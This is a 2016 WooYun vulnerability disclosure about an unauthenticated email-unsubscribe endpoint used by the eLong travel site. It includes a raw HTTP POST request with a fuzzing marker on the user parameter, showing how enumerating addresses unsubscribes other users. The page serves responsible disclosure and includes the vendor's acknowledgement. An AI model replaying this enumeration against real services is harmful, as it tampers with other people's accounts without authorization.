当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170068

漏洞标题:艺龙旅行网邮件订阅某功能越权

相关厂商:艺龙旅行网

漏洞作者: 路人甲

提交时间:2016-01-15 16:55

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-15: 细节已通知厂商并且等待厂商处理中
2016-01-18: 厂商已经确认,细节仅向厂商公开
2016-01-28: 细节向核心白帽子及相关领域专家公开
2016-02-07: 细节向普通白帽子公开
2016-02-17: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

邮件退订越权

详细说明:

艺龙旅行网的订阅邮件取消接口发送数据为:

POST /abo HTTP/1.1
Host: s3s.fr
Content-Length: 57
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://t.news.elong.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://t.news.elong.com/abo4/6fWmlkmvy/freebuf.com/l%27itdg/11459169/51187991.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,fr;q=0.2
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
lang=zh&envoi=6fWmlkmvy&domain=qq.com&user=§test§&raison=r1


貌似使用了一个第三方的服务,所以这应该是一个通用性的问题。使用domain和user参数来定位用户邮箱,这个接口没有做限制,遍历user就可以退订所有用户的邮件通知订阅。

漏洞证明:

使用qq邮箱进行测试:

屏幕快照 2016-01-15 上午9.52.18.png


屏幕快照 2016-01-15 上午9.49.39.png


只随机了两百个邮箱就命中多个用户。
结合网上泄露的用户邮箱账号会对邮箱订阅业务可能造成影响。

修复方案:

接口验证

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2016-01-18 13:58

厂商回复:

感谢白帽子,第三方漏洞,已通知修复!

最新状态:

暂无


漏洞评价:

评价